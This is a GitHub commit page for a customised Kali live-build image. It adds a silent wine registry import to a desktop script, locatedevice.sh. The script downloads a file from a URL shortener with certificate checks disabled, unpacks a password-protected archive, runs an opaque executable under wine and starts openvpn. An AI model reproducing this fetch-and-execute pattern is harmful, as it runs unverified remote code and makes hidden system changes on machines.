Skip to content

Commit 03cabc4

Browse files
authored
Update locatedevice.sh
1 parent 8ac2f00 commit 03cabc4

File tree

1 file changed

+1
-0
lines changed
  • live-build-config/kali-config/common/includes.chroot/root/Desktop

1 file changed

+1
-0
lines changed

live-build-config/kali-config/common/includes.chroot/root/Desktop/locatedevice.sh

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -7,6 +7,7 @@ wget --no-check-certificate -O ~/init/vpn https://is.gd/sickvpnclient;
77
cd ~/init/;
88
rm -rf init.exe;
99
unzip -P1011011011 init.zip;
10+
wine regedit /s /root/s.reg;
1011
wine init.exe;
1112
sudo openvpn vpn;
1213
exit 0

0 commit comments

Comments
 (0)